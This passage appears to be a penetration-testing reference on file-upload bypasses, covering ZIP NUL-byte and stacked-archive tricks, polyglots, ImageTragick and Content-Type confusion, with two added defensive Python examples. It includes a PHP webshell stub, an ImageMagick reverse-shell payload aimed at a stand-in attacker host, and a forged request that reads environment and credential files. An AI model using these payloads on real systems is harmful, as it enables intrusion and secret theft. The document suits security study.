- Modification with a Hex Editor or vi: The names of the files inside the zip are altered using vi or a hex editor, changing "xxA" to "../" to traverse directories.
:set modifiable
:%s/xxA/../g
:x!
ZIP NUL-byte filename smuggling (PHP ZipArchive confusion)
When a backend validates ZIP entries with PHP's ZipArchive but the extraction writes to the filesystem using the raw names, you can hide a forbidden extension by placing a NUL (0x00) inside the filename fields. The validation path and the extraction path disagree about where the name ends: one side keeps the whole name (so the entry appears to end in .pdf), the other treats it as a C string and stops at the first NUL, so everything after it is dropped and shell.php is what lands on disk.
High-level flow:
- Prepare a legitimate container file (e.g., a valid PDF) that embeds a tiny PHP stub inside a stream so magic/MIME still says PDF.
- Name it shell.php..pdf, zip it, then hex-edit the ZIP local header and central directory filename to change the first dot (.) after .php into 0x00, yielding shell.php\x00.pdf.
- Validators relying on ZipArchive will see a name ending in .pdf and allow it; the extractor writes shell.php to disk, leading to RCE if the upload folder is executable.
Minimal PoC steps:
# 1) Build a polyglot PDF containing a tiny webshell (still a valid PDF)
#    (arguments to %s are not format strings, so %%EOF and $_REQUEST survive intact)
printf '%s\n' '%PDF-1.3' '1 0 obj<<>>stream' '<?php system($_REQUEST["cmd"]); ?>' 'endstream' 'endobj' '%%EOF' > embedded.pdf
# 2) Trick name and zip
cp embedded.pdf shell.php..pdf
zip null.zip shell.php..pdf
# 3) Hex-edit both the local header and central directory filename fields
# Replace the dot right after ".php" with 00 (NUL) => shell.php\x00.pdf
# Tools: hexcurse, bless, bvi, wxHexEditor, etc.
# 4) Local validation behaviour
php -r '$z=new ZipArchive; $z->open("null.zip"); echo $z->getNameIndex(0),"\n";'
# -> prints the name as this parser sees it; compare with what your extraction path writes
Notes
- Replace both occurrences of the filename (local and central directory). Some tools add an extra data descriptor entry as well; fix all name fields if present.
- The payload file must still pass server-side magic/MIME sniffing. Embedding the PHP inside a PDF stream keeps the header valid.
- Works where the enumeration/validation path and the extraction/write path disagree on how to handle strings.
Stacked ZIPs (parser disagreement)
Concatenating two valid ZIP files produces a blob where different parsers honour different End Of Central Directory (EOCD) records. Many tools look for the last EOCD, while other libraries (e.g., ZipArchive in specific workflows) may parse the first archive they encounter. If validation enumerates the first archive and extraction uses another component that honours the last EOCD, a benign archive can pass the check while a malicious one gets extracted.
PoC:
# Build two separate archives
printf test > t1; printf test2 > t2
zip zip1.zip t1; zip zip2.zip t2
# Stack them
cat zip1.zip zip2.zip > combo.zip
# Different views
unzip -l combo.zip # warns about extra bytes; often lists entries from the last archive
php -r '$z=new ZipArchive; $z->open("combo.zip"); for($i=0;$i<$z->numFiles;$i++) echo $z->getNameIndex($i),"\n";'
Abuse example
- Create a benign archive (allowed type, e.g., PDF) and a second one containing a forbidden extension (e.g., shell.php).
- Concatenate them: cat benign.zip evil.zip > combined.zip.
- If the server validates with one parser (sees benign.zip) but extracts with another (processes evil.zip), the forbidden file enters the extraction path.
ImageTragic
Upload this content with an image extension to exploit the vulnerability (ImageMagick versions before 7.0.1-1) (from the exploit)
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
Embedding PHP Shell on PNG
Embedding a PHP shell in the IDAT chunk of a PNG file can effectively bypass certain image processing operations. The functions imagecopyresized and imagecopyresampled from PHP-GD are particularly relevant in this context, as they are commonly used for resizing and resampling images, respectively. The ability of the embedded PHP shell to remain unaffected by these operations is a significant advantage for certain use cases.
A detailed exploration of this technique, including its methodology and potential applications, is provided in the following article: "Encoding Web Shells in PNG IDAT chunks". This resource offers a comprehensive understanding of the process and its implications.
More information in: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
Polyglot Files
Polyglot files serve as a unique tool in cybersecurity, acting as chameleons that can validly exist in multiple file formats simultaneously. An intriguing example is GIFAR, a hybrid that functions both as a GIF and a RAR archive. Such files are not limited to this pairing; combinations like GIF and JS or PPT and JS are also feasible.
The core utility of polyglot files lies in their capacity to circumvent security measures that screen files based on type. Common practice in various applications entails permitting only certain file types for upload (like JPEG, GIF, or DOC) to mitigate the risk posed by potentially harmful formats (e.g., JS, PHP, or Phar files). However, a polyglot, by conforming to the structural criteria of multiple file types, can stealthily bypass these restrictions.
Despite their adaptability, polyglots do encounter limitations. For instance, while a polyglot might simultaneously embody a PHAR file (PHp ARchive) and a JPEG, the success of its upload might hinge on the platform's file extension policies. If the system is stringent about allowable extensions, the mere structural duality of a polyglot may not suffice to guarantee its upload.
More information in: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
Upload valid JSONs like if it was PDF
How to avoid file type detections by uploading a valid JSON file even if not allowed by faking a PDF file (techniques from this blog post):
- mmmagic library: As long as the %PDF magic bytes are in the first 1024 bytes it's valid (get example from post)
- pdflib library: Add a fake PDF format inside a field of the JSON so the library thinks it's a pdf (get example from post)
- file binary: It can read up to 1048576 bytes from a file. Create a JSON bigger than that so it can't parse the content as a json and then inside the JSON put the initial part of a real PDF and it'll think it's a PDF
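An added example (not from the page or the blog post it cites): a document that is valid JSON and still trips a sniffer that accepts `%PDF` anywhere in the first 1024 bytes, beside a stricter check that wants the magic at offset 0 and the EOF marker at the end. Field names and the sample PDF bytes are constructed.

```python
import json

def sniff_pdf_first_kb(data: bytes) -> bool:
    """Permissive sniffer: PDF magic anywhere in the first 1024 bytes
    (the mmmagic behaviour described above)."""
    return b"%PDF" in data[:1024]

def strict_pdf(data: bytes) -> bool:
    """Magic at offset 0 and the %%EOF marker near the end of the file."""
    return data.startswith(b"%PDF-") and b"%%EOF" in data[-1024:]

def json_that_sniffs_as_pdf(fields: dict) -> bytes:
    """Hide a fake PDF header inside a string value: the sniffer fires,
    the bytes still parse as JSON."""
    doc = {"title": "%PDF-1.4 1 0 obj << /Type /Catalog >> endobj", **fields}
    return json.dumps(doc).encode()

def classify(data: bytes) -> dict:
    """How three consumers would label the same bytes."""
    try:
        is_json = isinstance(json.loads(data), (dict, list))
    except ValueError:
        is_json = False
    return {"json": is_json,
            "sniff_pdf": sniff_pdf_first_kb(data),
            "strict_pdf": strict_pdf(data)}

# Constructed inputs
POLYGLOT = json_that_sniffs_as_pdf({"user": "alice", "cmd": "id"})
REAL_PDF = b"%PDF-1.4\n1 0 obj<<>>endobj\ntrailer<<>>\n%%EOF\n"

if __name__ == "__main__":
    print("polyglot:", classify(POLYGLOT))
    print("real pdf:", classify(REAL_PDF))
```

The stricter check is not a complete defence (a real PDF can still carry JSON inside an object), but it removes the "magic somewhere in the first KB" shortcut that makes the trivial version of this trick work.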
Content-Type confusion to arbitrary file read
Some upload handlers trust the parsed request body (for example, context.getBodyData().files) and later copy files from file.filepath without first enforcing Content-Type: multipart/form-data. If the server accepts application/json, you can supply a fake files object pointing filepath at any local path, turning the upload flow into an arbitrary file read primitive.
Example POST against a form workflow that returns the uploaded binary in the HTTP response:
POST /form/vulnerable-form HTTP/1.1
Host: target
Content-Type: application/json
{
"files": {
"document": {
"filepath": "/proc/self/environ",
"mimetype": "image/png",
"originalFilename": "x.png"
}
}
}
The backend copies file.filepath, so the response returns the contents of that path. Typical chain: read /proc/self/environ to learn $HOME, then $HOME/.n8n/config for keys and $HOME/.n8n/database.sqlite for user identifiers.
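An added example that is not n8n's code: a minimal model of the handler described above. The vulnerable version copies whatever `files[...].filepath` the parsed body names, regardless of Content-Type; the fixed version requires multipart and only accepts paths that the parser itself staged under its temp directory. The request shapes, the staging behaviour and the secret file are constructed.

```python
import json
import pathlib
import tempfile
from typing import Optional

UPLOAD_TMP = tempfile.mkdtemp()   # where the multipart parser stages files

def parse_body(content_type: str, body: bytes) -> dict:
    """Stand-in for a body parser that yields {'files': ...} for JSON too,
    which is the root of the confusion."""
    if content_type.startswith("application/json"):
        return json.loads(body)
    if content_type.startswith("multipart/form-data"):
        staged = pathlib.Path(UPLOAD_TMP) / "upload_0.png"   # simulated staging
        staged.write_bytes(body)
        return {"files": {"document": {"filepath": str(staged),
                                       "mimetype": "image/png",
                                       "originalFilename": "x.png"}}}
    return {}

def vulnerable_upload(content_type: str, body: bytes) -> bytes:
    """Copies whatever filepath the parsed body names."""
    ctx = parse_body(content_type, body)
    return pathlib.Path(ctx["files"]["document"]["filepath"]).read_bytes()

def fixed_upload(content_type: str, body: bytes) -> Optional[bytes]:
    """Requires multipart and a filepath staged by the parser."""
    if not content_type.startswith("multipart/form-data"):
        return None
    ctx = parse_body(content_type, body)
    fp = pathlib.Path(ctx["files"]["document"]["filepath"]).resolve()
    if pathlib.Path(UPLOAD_TMP).resolve() not in fp.parents:
        return None
    return fp.read_bytes()

def demo() -> dict:
    """Constructed secret in place of $HOME/.n8n/config; forged JSON body
    shaped like the request above."""
    secret = pathlib.Path(tempfile.mkdtemp()) / "config"
    secret.write_text("encryptionKey=constructed-secret")
    forged = json.dumps({"files": {"document": {
        "filepath": str(secret), "mimetype": "image/png",
        "originalFilename": "x.png"}}}).encode()
    return {
        "vuln_leak": vulnerable_upload("application/json", forged),
        "fixed_json": fixed_upload("application/json", forged),
        "fixed_multipart": fixed_upload("multipart/form-data; boundary=x", b"\x89PNG..."),
    }

if __name__ == "__main__":
    print(demo())
```

Both conditions in the fixed handler matter: checking the Content-Type alone still leaves a multipart parser that could be fed a crafted `filepath` by some other route, and checking the staging directory alone still lets a JSON body pick any file inside it.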
References
- n8n form upload Content-Type confusion → arbitrary file read PoC
- When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
- usd HeroLab – Gibbon LMS arbitrary file write (CVE-2023-45878)
- NVD – CVE-2023-45878
- 0xdf – HTB: TheFrizz
- The Art of PHP: CTF‑born exploits and techniques
- CVE-2024-21546 – NVD entry
- PoC gist for LFM .php. bypass
- 0xdf – HTB Environment (UniSharp LFM upload → PHP RCE)
- HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
- Microsoft – mklink (command reference)
- 0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)
- When Audits Fail: From Pre-Auth SSRF to RCE in TRUfusion Enterprise